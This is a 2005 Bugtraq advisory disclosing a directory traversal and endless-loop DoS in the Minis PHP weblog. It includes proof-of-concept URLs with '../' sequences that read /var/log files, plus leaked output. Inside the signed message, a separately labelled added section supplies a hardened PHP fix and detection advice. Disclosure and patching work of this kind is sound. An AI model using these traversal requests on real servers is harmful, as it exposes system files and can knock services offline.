
List:       bugtraq
Subject:    Minis directory traversal vulnerability
From:       Madelman <madelman () iname ! com>
Date:       2005-01-16 18:04:16
Message-ID: 41EAACA0.1040700 () iname ! com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Title: Minis directory traversal vulnerability
Vulnerability discovery: Madelman <madelman AT iname.com>
Date: 31/12/2004
Severity: Moderate

Summary:
- --------

(from vendor site: http://minis.sourceforge.net/)

Minis is a tiny, PHP-powered, text-file based weblogging system.
It is easily configured for normal use and it doesn't require any
databases, such as MySQL. Also, with some PHP knowledge you'll be
able to configure Minis endlessly.

Minis does not validate the month parameter, which allows reading any file with the .log extension.

This vulnerability has been tested with Minis 0.2.1


Details:
- --------

If we want to read /var/log/XFree86.0.log:

REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/XFree86.0
RETURNS: (looking at source of HTML)
[...]
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=This is a pre-release version of XFree86, and is not supported in any "></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=way.  Bugs may be reported to XFree86@XFree86.Org and patches submitted "></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=to fixes@XFree86.Org.  Before reporting bugs in pre-release versions, "></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=please check the latest version in the XFree86 CVS repository "></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=(http://www.XFree86.Org/cvs).
 "></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=
 "></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=XFree86 Version 4.3.0.1 (Debian 4.3.0.dfsg.1-4 20040529113443 root@cyberhq.internal.cyberhqz.com) "></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Release Date: 15 August 2003 "></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=X Protocol Version 11, Revision 0, Release 6.6 "></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Build Operating System: Linux 2.6.6-rc3-bk9 i686 [ELF] "></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Build Date: 29 May 2004 [...]

If we try to read a file that doesn't exist (in this example /var/log/XFree86.log), Minis returns "No such month".

REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/XFree86
RESPONSE:
No such month.


If we try to read a file the web server is not authorized to open, Minis enters an endless loop, which could consume a large amount of the server's bandwidth or even cause a DoS.

REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/auth
RETURNS:
Warning: fopen(blog/../../../../../../../../var/log/auth.log): failed to open stream: Permission denied in /var/www/minis/minis.php on line 109

../../../../../../../../var/log/auth

Warning: feof(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 111

Warning: fgets(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 112

Warning: feof(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 111

Warning: fgets(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 112 [...]
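The quoted warnings show the whole mechanism: line 109 calls fopen() on "blog/" . $month . ".log" with the month taken straight from the query string, and lines 111/112 run a feof()/fgets() loop on the result without checking whether fopen() succeeded. When fopen() fails, $fp is false; in the PHP of that era feof(false) only emits the warning and returns false, so while (!feof($fp)) never terminates, which is the endless loop described above. The following is an added example and not Minis code (the advisory does not include the application source): a reconstruction of that pattern as a comment, beside a hardened replacement that allow-lists the parameter shape, confines the resolved path to the blog directory, and loops on fgets() instead of feof(). The function name read_month_log(), the blog/ directory layout and the YYYY-MM file naming are assumptions.

```php
<?php
// Added example, not Minis source. The vulnerable sketch is reconstructed from the
// warnings quoted in the advisory (fopen() on line 109, feof()/fgets() on 111/112);
// the helper name, the blog/ layout and the YYYY-MM file naming are assumptions.

// --- Vulnerable pattern (reconstruction, shown only as a comment) ---
//   $fp = fopen("blog/$month.log", "r");   // $month comes straight from the query string
//   while (!feof($fp)) {                   // if fopen() failed, $fp is false and
//       $line = fgets($fp);                // feof(false) only warns and returns false,
//       ...                                // so the loop never terminates
//   }

/**
 * Read one month's log from $blogDir and return its lines, or null when the
 * request must be refused (bad parameter, path outside $blogDir, unreadable file).
 */
function read_month_log(string $blogDir, string $month): ?array
{
    // 1. Allow-list the shape of the parameter: exactly YYYY-MM. "../" can never match.
    if (!preg_match('/^\d{4}-(0[1-9]|1[0-2])$/', $month)) {
        return null;
    }

    // 2. Defence in depth: canonicalise and confirm the file is inside the blog directory.
    $base = realpath($blogDir);
    $path = realpath($blogDir . DIRECTORY_SEPARATOR . $month . '.log');
    if ($base === false || $path === false) {
        return null;                                   // directory or file absent ("No such month")
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                                   // resolved outside $blogDir
    }

    // 3. Check fopen()'s result before using the stream, and loop on fgets(), not feof():
    //    fgets() returns false at EOF and on error alike, so the loop always terminates.
    $fp = @fopen($path, 'r');
    if ($fp === false) {
        return null;                                   // e.g. permission denied: no warnings, no endless loop
    }
    $lines = [];
    while (($line = fgets($fp)) !== false) {
        $lines[] = rtrim($line, "\r\n");
    }
    fclose($fp);
    return $lines;
}

// --- Self-check against a constructed blog directory (run with: php this_file.php) ---
if (PHP_SAPI === 'cli' && realpath($argv[0]) === __FILE__) {
    $root = sys_get_temp_dir() . '/minis_example_' . getmypid();
    mkdir($root . '/blog', 0700, true);
    file_put_contents($root . '/blog/2005-01.log', "first entry\nsecond entry\n");
    file_put_contents($root . '/outside.log', "must never be served\n");

    $checks = [
        'valid month'       => read_month_log($root . '/blog', '2005-01') === ['first entry', 'second entry'],
        'missing month'     => read_month_log($root . '/blog', '2004-12') === null,
        'malformed month'   => read_month_log($root . '/blog', '2005-13') === null,
        'traversal attempt' => read_month_log($root . '/blog', '../outside') === null,
    ];
    foreach ($checks as $name => $ok) {
        echo str_pad($name, 20), $ok ? "ok\n" : "FAILED\n";
    }

    unlink($root . '/blog/2005-01.log');
    unlink($root . '/outside.log');
    rmdir($root . '/blog');
    rmdir($root);
}
```

The allow-list in step 1 is the fix that matters; the realpath() containment in step 2 protects against a later change that loosens the pattern, and step 3 removes the DoS independently of the traversal. For an administrator who cannot patch immediately, the three response shapes shown in this advisory (file contents, "No such month", or a burst of feof()/fgets() warnings) and a month parameter containing "../" in the web server's access log are the signals to watch for.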


Timeline
- --------

31/12/2004 - Vulnerability found
31/12/2004 - Vendor contacted
16/01/2005 - Vendor hasn't replied. Advisory released
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFB6qyg3RWooxY20cIRAg4cAJ41z36lEK44et5nx4V6tspofoo+zACgnLr6
nUEj8oDBySiBN2ScbMinO7s=
=sSF1
-----END PGP SIGNATURE-----

